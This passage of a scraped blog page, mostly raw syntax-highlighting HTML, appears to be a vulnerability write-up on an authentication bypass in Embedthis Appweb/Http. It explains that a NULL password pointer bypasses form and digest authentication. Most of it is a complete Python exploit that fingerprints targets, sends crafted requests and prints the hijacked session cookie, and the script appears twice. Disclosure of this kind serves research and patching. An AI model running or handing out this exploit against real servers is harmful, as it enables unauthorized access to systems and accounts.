class=\"crayon-s\">&#8220;msg:&#8217;Password failed to authenticate&#8217;, username:&#8217;%s'&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-91\"><span class=\"crayon-cn\">2052<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-92\"><span class=\"crayon-cn\">2053<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">success<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-93\"><span class=\"crayon-cn\">2054<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c3985105449381-94\"><span class=\"crayon-cn\">2055<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c3985105449381-95\"><span class=\"crayon-cn\">2056<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>To bypass authentication we need to pass a NULL password pointer. Both for form and for digest authentication, the functions used to parse the authentication details (line 1666) allow the password pointer to be left NULL; although they return an error in that case, the return value is never checked by authCondition, so authentication is bypassed completely. The only precondition is knowing a username that exists in the hashmap.<\/p>\n<p>To overcome this limitation, consider that the hashmap is usually small and that the hash algorithm it uses (FNV) is weak: with a limited number of tries it could be possible to find a collision and log in without knowing a valid username (untested).<\/p>\n<p><strong>Exploit<\/strong><\/p>\n<div id=\"crayon-5aa9a042c398b916061744\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\"
style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<\/p>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import requests  import argparse    print &#8220;&#8221;&#8221;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  Embedthis Appweb\/Http Zero-Day Form\/Digest Authentication Bypass
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-  &#8220;&#8221;&#8221;    def test_digest(r):      auth = [&#8220;realm&#8221;, &#8220;domain&#8221;, &#8220;qop&#8221;, &#8220;nonce&#8221;, &#8220;opaque&#8221;, &#8220;algorithm&#8221;, &#8220;stale&#8221;, &#8220;MD5&#8221;, &#8220;FALSE&#8221;, &#8220;Digest&#8221;]      wwwauthenticate = r.headers.get(&#8216;WWW-Authenticate&#8217;)        if wwwauthenticate is None:          return False        for k in auth:          if k not in wwwauthenticate:              return False        return True      def test_form(r):      &#8220;&#8221;&#8221; extremely shoddy recognition, expect false positives &#8220;&#8221;&#8221;        auth = [(&#8220;X-XSS-Protection&#8221;, &#8220;1; mode=block&#8221;), (&#8220;X-Content-Type-Options&#8221;, &#8220;nosniff&#8221;), (&#8220;ETag&#8221;, None), (&#8220;Date&#8221;, None)]      potential_auth = [(&#8220;Last Modified&#8221;, &#8220;&#8221;), (&#8220;X-Frame-Options&#8221;, &#8220;SAMEORIGIN&#8221;), (&#8220;Accept-Ranges&#8221;, &#8220;bytes&#8221;), (&#8220;Content-Type&#8221;, &#8220;text\/html&#8221;)]        if r.headers.get(&#8220;WWW-Authenticate&#8221;) is not None:          return False        for k, v in auth:          rv = r.headers.get(k)          if not rv:              return False          if v is not None and v != rv:              return False        potential_count = 0      for k, v in potential_auth:          rv = r.headers.get(k)          if rv and v != &#8220;&#8221; and v == rv:              potential_count += 1        print &#8220;[+] Optional matchings: {}\/{}&#8221;.format(potential_count, len(potential_auth))      return True      def test(url):      &#8220;&#8221;&#8221; Newer EmbedThis HTTP Library\/Appweb versions do not advertise their presence in headers, sometimes might be proxied by nginx\/apache, we can only look for a default headers 
configuration &#8220;&#8221;&#8221;        r = requests.get(url)        # EmbedThis GoAhead uses a similar headers configuration, let&#8217;s skip it explicitly      serv = r.headers.get(&#8220;Server&#8221;)      if serv and &#8220;GoAhead&#8221; in serv:          return False        if test_digest(r):          return &#8220;digest&#8221;      elif test_form(r):          return &#8220;form&#8221;      return None      def exploit(url, username=&#8221;joshua&#8221;, authtype=&#8221;digest&#8221;):      payload = { &#8220;username&#8221;: username }        headers = {          &#8220;authorization&#8221;: &#8220;Digest username={}&#8221;.format(username),          &#8220;user-agent&#8221;: &#8220;TruelBot&#8221;,          &#8220;content-type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,      }        if authtype == &#8220;digest&#8221;:          r = requests.get(url, data=payload, headers=headers)      else:          r = requests.post(url, data=payload, headers=headers)  \t\t  \tprint(r.content)  \t      if r.status_code != 200 or len(r.cookies) &lt; 1:          print &#8220;[!] 
Exploit failed, HTTP status code {}&#8221;.format(r.status_code)          return        print &#8220;[*] Succesfully exploited, here&#8217;s your c00kie:n  {}&#8221;.format(dict(r.cookies))      if __name__ == &#8220;__main__&#8221;:      parser = argparse.ArgumentParser(description=&#8221;Test&amp;Exploit EmbedThis form\/digest authentication bypass (CVE-XXXX-YYYY)&#8221;)      parser.add_argument(&#8216;-t&#8217;, &#8216;&#8211;target&#8217;, required=True, help=&#8221;specify the target url (i.e., http(s):\/\/target-url[:port]\/)&#8221;)      parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;user&#8217;, required=True, help=&#8221;you need to know a valid user name&#8221;)      parser.add_argument(&#8216;-c&#8217;, &#8216;&#8211;check&#8217;, action=&#8217;store_true&#8217;, default=False, help=&#8221;test for exploitability without running the actual exploit&#8221;)      parser.add_argument(&#8216;-f&#8217;, &#8216;&#8211;force&#8217;, action=&#8217;store_true&#8217;, default=False, help=&#8221;skip exploitability test&#8221;)      args = parser.parse_args()        url = args.target      username = args.user      t = &#8220;form&#8221; # default will try form\/post      if args.check or not args.force:          t = test(url)        if t is None:          print &#8220;[!] Target does not appear to be Appweb\/Embedthis HTTP with form\/post auth (force with -f)&#8221;      else:          print &#8220;[+] Potential appweb\/embedthis http, {} method&#8221;.format(t)        if not args.check:          print &#8220;[!] 
Exploiting {}, user {}!&#8221;.format(url, username)          exploit(url, username, t)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">argparse<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-5\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span 
class=\"crayon-s\">&#8220;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-6\"><span class=\"crayon-s\">Embedthis Appweb\/Http Zero-Day Form\/Digest Authentication Bypass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-7\"><span class=\"crayon-s\">&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-8\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-10\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test_digest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8220;realm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;domain&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;qop&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nonce&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-s\">&#8220;opaque&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;algorithm&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;stale&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;MD5&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;FALSE&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Digest&#8221;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-12\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">wwwauthenticate<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;WWW-Authenticate&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">wwwauthenticate <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span 
class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">k<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">wwwauthenticate<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-23\">&nbsp;<\/div>\n<div 
class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-24\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8221; extremely shoddy recognition, expect false positives &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-XSS-Protection&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;1; mode=block&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-Content-Type-Options&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;nosniff&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;ETag&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Date&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Last Modified&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;X-Frame-Options&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;SAMEORIGIN&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Accept-Ranges&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;bytes&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Content-Type&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;text\/html&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-5aa9a042c398b916061744-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;WWW-Authenticate&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">is<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-38\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-t\">False<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-40\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-41\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-42\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">headers<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">k<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-43\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">rv <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">!=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">v<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-44\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-46\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Optional matchings: {}\/{}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">potential_count<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">potential_auth<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5aa9a042c398b916061744-49\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-50\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">test<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">url<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-s\">&#8221; Newer EmbedThis HTTP Library\/Appweb versions do not advertise their presence in headers, sometimes might be proxied by nginx\/apache, we can only look for a default headers configuration &#8220;<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5aa9a042c398b916061744-52\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5aa9a042c398b916061744-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span 